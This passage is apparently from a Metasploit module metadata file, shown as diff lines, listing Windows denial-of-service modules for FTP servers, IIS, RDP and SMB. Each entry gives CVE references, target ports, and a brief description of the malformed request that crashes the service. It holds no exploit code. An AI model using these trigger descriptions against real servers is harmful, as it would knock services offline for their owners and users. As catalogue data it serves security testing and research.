"auxiliary/dos/windows/ftp/guildftp_cwdlist", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-10-12", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable\n to heap corruption. You need to have a valid login\n so you can run CWD and LIST.", - "references": [ - "CVE-2008-4572", - "OSVDB-49045", - "EDB-6738" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/guildftp_cwdlist", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/iis75_ftpd_iac_bof": { - "name": "Microsoft IIS FTP Server Encoded Response Overflow Trigger", - "fullname": "auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-12-21", - "type": "auxiliary", - "author": [ - "Matthew Bergin", - "jduck " - ], - "description": "This module triggers a heap overflow when processing a specially crafted\n FTP request containing Telnet IAC (0xff) bytes. When constructing the response,\n the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes.\n\n This issue can be triggered pre-auth and may in fact be exploitable for\n remote code execution.", - "references": [ - "CVE-2010-3972", - "OSVDB-70167", - "BID-45542", - "MSB-MS11-004", - "EDB-15803", - "URL-https://msrc-blog.microsoft.com/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability/" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/iis75_ftpd_iac_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/iis_list_exhaustion": { - "name": "Microsoft IIS FTP Server LIST Stack Exhaustion", - "fullname": "auxiliary/dos/windows/ftp/iis_list_exhaustion", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-09-03", - "type": "auxiliary", - "author": [ - "Kingcope", - "Myo Soe" - ], - "description": "This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.", - "references": [ - "CVE-2009-2521", - "BID-36273", - "OSVDB-57753", - "MSB-MS09-053", - "URL-http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/iis_list_exhaustion", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/solarftp_user": { - "name": "Solar FTP Server Malformed USER Denial of Service", - "fullname": "auxiliary/dos/windows/ftp/solarftp_user", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-02-22", - "type": "auxiliary", - "author": [ - "x000 <3d3n@hotmail.com.br>", - "C4SS!0 G0M3S ", - "sinn3r " - ], - "description": "This module will send a format string as USER to Solar FTP, causing a\n READ violation in function \"__output_1()\" found in \"sfsservice.exe\"\n while trying to calculate the length of the string. This vulnerability\n affects versions 2.1.1 and earlier.", - "references": [ - "EDB-16204" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/solarftp_user.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/solarftp_user", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/titan626_site": { - "name": "Titan FTP Server 6.26.630 SITE WHO DoS", - "fullname": "auxiliary/dos/windows/ftp/titan626_site", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-10-14", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "The Titan FTP server v6.26 build 630 can be DoS'd by\n issuing \"SITE WHO\". You need a valid login so you\n can send this command.", - "references": [ - "CVE-2008-6082", - "OSVDB-49177", - "EDB-6753" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/titan626_site.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/titan626_site", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/vicftps50_list": { - "name": "Victory FTP Server 5.0 LIST DoS", - "fullname": "auxiliary/dos/windows/ftp/vicftps50_list", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-10-24", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "The Victory FTP Server v5.0 can be brought down by sending\n a very simple LIST command", - "references": [ - "CVE-2008-2031", - "CVE-2008-6829", - "OSVDB-44608", - "EDB-6834" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/vicftps50_list", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/winftp230_nlst": { - "name": "WinFTP 2.3.0 NLST Denial of Service", - "fullname": "auxiliary/dos/windows/ftp/winftp230_nlst", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-09-26", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "This module is a very rough port of Julien Bedard's\n PoC. You need a valid login, but even anonymous can\n do it if it has permission to call NLST.", - "references": [ - "CVE-2008-5666", - "OSVDB-49043", - "EDB-6581" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/winftp230_nlst", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/xmeasy560_nlst": { - "name": "XM Easy Personal FTP Server 5.6.0 NLST DoS", - "fullname": "auxiliary/dos/windows/ftp/xmeasy560_nlst", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-10-13", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "This module is a port of shinnai's script. You need\n a valid login, but even anonymous can do it as long\n as it has permission to call NLST.", - "references": [ - "CVE-2008-5626", - "OSVDB-50837", - "EDB-6741" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/xmeasy560_nlst", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/xmeasy570_nlst": { - "name": "XM Easy Personal FTP Server 5.7.0 NLST DoS", - "fullname": "auxiliary/dos/windows/ftp/xmeasy570_nlst", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-03-27", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "You need a valid login to DoS this FTP server, but\n even anonymous can do it as long as it has permission\n to call NLST.", - "references": [ - "CVE-2008-5626", - "OSVDB-50837", - "EDB-8294" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/xmeasy570_nlst", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/games/kaillera": { - "name": "Kaillera 0.86 Server Denial of Service", - "fullname": "auxiliary/dos/windows/games/kaillera", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-07-02", - "type": "auxiliary", - "author": [ - "Sil3nt_Dre4m" - ], - "description": "The Kaillera 0.86 server can be shut down by sending any malformed packet\n after the initial \"hello\" packet.", - "references": [], - "platform": "", - "arch": "", - "rport": 27888, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/games/kaillera.rb", - "is_install_path": true, - "ref_name": "dos/windows/games/kaillera", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166": { - "name": "Windows IIS HTTP Protocol Stack DOS", - "fullname": "auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-05-11", - "type": "auxiliary", - "author": [ - "Max", - "Stefan Blair", - "Axel Souchet", - "Maurice LAMBERT " - ], - "description": "This module exploits CVE-2021-31166, a UAF bug in http.sys\n when parsing specially crafted Accept-Encoding headers\n that was patched by Microsoft in May 2021, on vulnerable\n IIS servers. Successful exploitation will result in\n the target computer BSOD'ing before subsequently rebooting.\n Note that the target IIS server may or may not come back up,\n this depends on the target's settings as to whether IIS\n is configured to start on reboot.", - "references": [ - "CVE-2021-31166", - "URL-https://nvd.nist.gov/vuln/detail/CVE-2021-31166", - "URL-https://github.com/mauricelambert/CVE-2021-31166", - "URL-https://twitter.com/metr0/status/1392631376592076805", - "URL-https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-10-01 17:54:59 +0000", - "path": "/modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.rb", - "is_install_path": true, - "ref_name": "dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs", - "screen-effects" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/http/ms10_065_ii6_asp_dos": { - "name": "Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service", - "fullname": "auxiliary/dos/windows/http/ms10_065_ii6_asp_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-09-14", - "type": "auxiliary", - "author": [ - "Heyder Andrade ", - "Leandro Oliveira " - ], - "description": "The vulnerability allows remote unauthenticated attackers to force the IIS server\n to become unresponsive until the IIS service is restarted manually by the administrator.\n Required is that Active Server Pages are hosted by the IIS and that an ASP script reads\n out a Post Form value.", - "references": [ - "CVE-2010-1899", - "OSVDB-67978", - "MSB-MS10-065", - "EDB-15167" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb", - "is_install_path": true, - "ref_name": "dos/windows/http/ms10_065_ii6_asp_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/http/pi3web_isapi": { - "name": "Pi3Web ISAPI DoS", - "fullname": "auxiliary/dos/windows/http/pi3web_isapi", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-11-13", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "The Pi3Web HTTP server crashes when a request is made for an invalid DLL\n file in /isapi for versions 2.0.13 and earlier. By default, the non-DLLs\n in this directory after installation are users.txt, install.daf and\n readme.daf.", - "references": [ - "CVE-2008-6938", - "OSVDB-49998", - "EDB-7109" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/http/pi3web_isapi.rb", - "is_install_path": true, - "ref_name": "dos/windows/http/pi3web_isapi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/llmnr/ms11_030_dnsapi": { - "name": "Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS", - "fullname": "auxiliary/dos/windows/llmnr/ms11_030_dnsapi", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-04-12", - "type": "auxiliary", - "author": [ - "jduck " - ], - "description": "This module exploits a buffer underrun vulnerability in Microsoft's DNSAPI.dll\n as distributed with Windows Vista and later without KB2509553. By sending a\n specially crafted LLMNR query, containing a leading '.' character, an attacker\n can trigger stack exhaustion or potentially cause stack memory corruption.\n\n Although this vulnerability may lead to code execution, it has not been proven\n to be possible at the time of this writing.\n\n NOTE: In some circumstances, a '.' may be found before the top of the stack is\n reached. In these cases, this module may not be able to cause a crash.", - "references": [ - "CVE-2011-0657", - "OSVDB-71780", - "MSB-MS11-030" - ], - "platform": "", - "arch": "", - "rport": 5355, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb", - "is_install_path": true, - "ref_name": "dos/windows/llmnr/ms11_030_dnsapi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/nat/nat_helper": { - "name": "Microsoft Windows NAT Helper Denial of Service", - "fullname": "auxiliary/dos/windows/nat/nat_helper", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-10-26", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module exploits a denial of service vulnerability\n within the Internet Connection Sharing service in\n Windows XP.", - "references": [ - "OSVDB-30096", - "BID-20804", - "CVE-2006-5614" - ], - "platform": "", - "arch": "", - "rport": 53, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/nat/nat_helper.rb", - "is_install_path": true, - "ref_name": "dos/windows/nat/nat_helper", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/rdp/ms12_020_maxchannelids": { - "name": "MS12-020 Microsoft Remote Desktop Use-After-Free DoS", - "fullname": "auxiliary/dos/windows/rdp/ms12_020_maxchannelids", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-03-16", - "type": "auxiliary", - "author": [ - "Luigi Auriemma", - "Daniel Godas-Lopez", - "Alex Ionescu", - "jduck ", - "#ms12-020" - ], - "description": "This module exploits the MS12-020 RDP vulnerability originally discovered and\n reported by Luigi Auriemma. The flaw can be found in the way the T.125\n ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result\n an invalid pointer being used, therefore causing a denial-of-service condition.", - "references": [ - "CVE-2012-0002", - "MSB-MS12-020", - "URL-http://www.privatepaste.com/ffe875e04a", - "URL-http://web.archive.org/web/20161020044803/http://pastie.org/private/4egcqt9nucxnsiksudy5dw", - "URL-http://web.archive.org/web/20160627131634/http://pastie.org/private/feg8du0e9kfagng4rrg", - "URL-http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html", - "EDB-18606", - "URL-https://www.rapid7.com/blog/post/2012/03/21/metasploit-update/" - ], - "platform": "", - "arch": "", - "rport": 3389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-07 12:36:11 +0000", - "path": "/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids.rb", - "is_install_path": true, - "ref_name": "dos/windows/rdp/ms12_020_maxchannelids", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smb/ms05_047_pnp": { - "name": "Microsoft Plug and Play Service Registry Overflow", - "fullname": "auxiliary/dos/windows/smb/ms05_047_pnp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module triggers a stack buffer overflow in the Windows Plug\n and Play service. This vulnerability can be exploited on\n Windows 2000 without a valid user account. Since the PnP\n service runs inside the service.exe process, this module\n will result in a forced reboot on Windows 2000. Obtaining\n code execution is possible if user-controlled memory can\n be placed at 0x00000030, 0x0030005C, or 0x005C005C.", - "references": [ - "CVE-2005-2120", - "MSB-MS05-047", - "BID-15065", - "OSVDB-18830" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/ms05_047_pnp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smb/ms06_035_mailslot": { - "name": "Microsoft SRV.SYS Mailslot Write Corruption", - "fullname": "auxiliary/dos/windows/smb/ms06_035_mailslot", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-07-11", - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module triggers a kernel pool corruption bug in SRV.SYS. Each\n call to the mailslot write function results in a two byte return value\n being written into the response packet. The code which creates this packet\n fails to consider these two bytes in the allocation routine, resulting in\n a slow corruption of the kernel memory pool. These two bytes are almost\n always set to \"\\xff\\xff\" (a short integer with value of -1).", - "references": [ - "BID-19215", - "OSVDB-27644", - "CVE-2006-3942", - "URL-http://www.coresecurity.com/common/showdoc.php?idx=562&idxseccion=10", - "MSB-MS06-035" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/ms06_035_mailslot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "Attack", - "description": "Run Denial of Service" - } - ] - }, - "auxiliary_dos/windows/smb/ms06_063_trans": { - "name": "Microsoft SRV.SYS Pipe Transaction No Null", - "fullname": "auxiliary/dos/windows/smb/ms06_063_trans", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module exploits a NULL pointer dereference flaw in the\n SRV.SYS driver of the Windows operating system. This bug was\n independently discovered by CORE Security and ISS.", - "references": [ - "OSVDB-27644", - "MSB-MS06-063", - "CVE-2006-3942", - "BID-19215" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-05-13 16:34:47 +0000", - "path": "/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/ms06_063_trans", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smb/ms09_001_write": { - "name": "Microsoft SRV.SYS WriteAndX Invalid DataOffset", - "fullname": "auxiliary/dos/windows/smb/ms09_001_write", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "j.v.vallejo " - ], - "description": "This module exploits a denial of service vulnerability in the\n SRV.SYS driver of the Windows operating system.\n\n This module has been tested successfully against Windows Vista.", - "references": [ - "MSB-MS09-001", - "OSVDB-48153", - "CVE-2008-4114", - "BID-31179" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-05-13 16:34:47 +0000", - "path": "/modules/auxiliary/dos/windows/smb/ms09_001_write.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/ms09_001_write", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smb/ms09_050_smb2_negotiate_pidhigh": { - "name": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference", - "fullname": "auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Laurent Gaffie ", - "hdm " - ], - "description": "This module exploits an out of bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows\tVista\n without SP1 does not seem affected by this flaw.", - "references": [ - "CVE-2009-3103", - "BID-36299", - "OSVDB-57799", - "MSB-MS09-050", - "URL-https://seclists.org/fulldisclosure/2009/Sep/39" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/ms09_050_smb2_negotiate_pidhigh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smb/ms09_050_smb2_session_logoff": { - "name": "Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference", - "fullname": "auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "sf " - ], - "description": "This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing\n an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD.\n Effecting Vista SP1/SP2 (And possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.", - "references": [ - "CVE-2009-3103", - "OSVDB-57799", - "MSB-MS09-050" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/ms09_050_smb2_session_logoff", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smb/ms10_006_negotiate_response_loop": { - "name": "Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop", - "fullname": "auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Laurent Gaffie ", - "hdm " - ], - "description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger\n this bug, run this module as a service and forces a vulnerable client\n to access the IP of this system as an SMB server. This can be accomplished\n by embedding a UNC path (\\HOST\\share\\something) into a web page if the\n target is using Internet Explorer, or a Word document otherwise.", - "references": [ - "CVE-2010-0017", - "OSVDB-62244", - "MSB-MS10-006", - "URL-http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-08-24 21:38:44 +0000", - "path": "/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/ms10_006_negotiate_response_loop", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smb/ms10_054_queryfs_pool_overflow": { - "name": "Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS", - "fullname": "auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Laurent Gaffie ", - "jduck " - ], - "description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB service on versions of Windows prior to the August 2010 Patch\n Tuesday. To trigger this bug, you must be able to access a share with\n at least read privileges. That generally means you will need authentication.\n However, if a system has a guest accessible share, you can trigger it\n without any authentication.", - "references": [ - "CVE-2010-2550", - "OSVDB-66974", - "MSB-MS10-054", - "URL-https://seclists.org/fulldisclosure/2010/Aug/122" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-05-13 16:34:47 +0000", - "path": "/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/ms10_054_queryfs_pool_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smb/ms11_019_electbowser": { - "name": "Microsoft Windows Browser Pool DoS", - "fullname": "auxiliary/dos/windows/smb/ms11_019_electbowser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Cupidon-3005", - "jduck " - ], - "description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB service on versions of Windows Server 2003 that have been\n configured as a domain controller. By sending a specially crafted election\n request, an attacker can cause a pool overflow.\n\n The vulnerability appears to be due to an error handling a length value\n while calculating the amount of memory to copy to a buffer. When there are\n zero bytes left in the buffer, the length value is improperly decremented\n and an integer underflow occurs. The resulting value is used in several\n calculations and is then passed as the length value to an inline memcpy\n operation.\n\n Unfortunately, the length value appears to be fixed at -2 (0xfffffffe) and\n causes considerable damage to kernel heap memory. While theoretically possible,\n it does not appear to be trivial to turn this vulnerability into remote (or\n even local) code execution.", - "references": [ - "CVE-2011-0654", - "BID-46360", - "OSVDB-70881", - "MSB-MS11-019", - "EDB-16166", - "URL-https://seclists.org/fulldisclosure/2011/Feb/285" - ], - "platform": "", - "arch": "", - "rport": 138, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/ms11_019_electbowser", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/smb/rras_vls_null_deref": { - "name": "Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference", - "fullname": "auxiliary/dos/windows/smb/rras_vls_null_deref", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-06-14", - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module triggers a NULL dereference in svchost.exe on\n all current versions of Windows that run the RRAS service. This\n service is only accessible without authentication on Windows XP\n SP1 (using the SRVSVC pipe).", - "references": [ - "OSVDB-64340" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb", - "is_install_path": true, - "ref_name": "dos/windows/smb/rras_vls_null_deref", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - 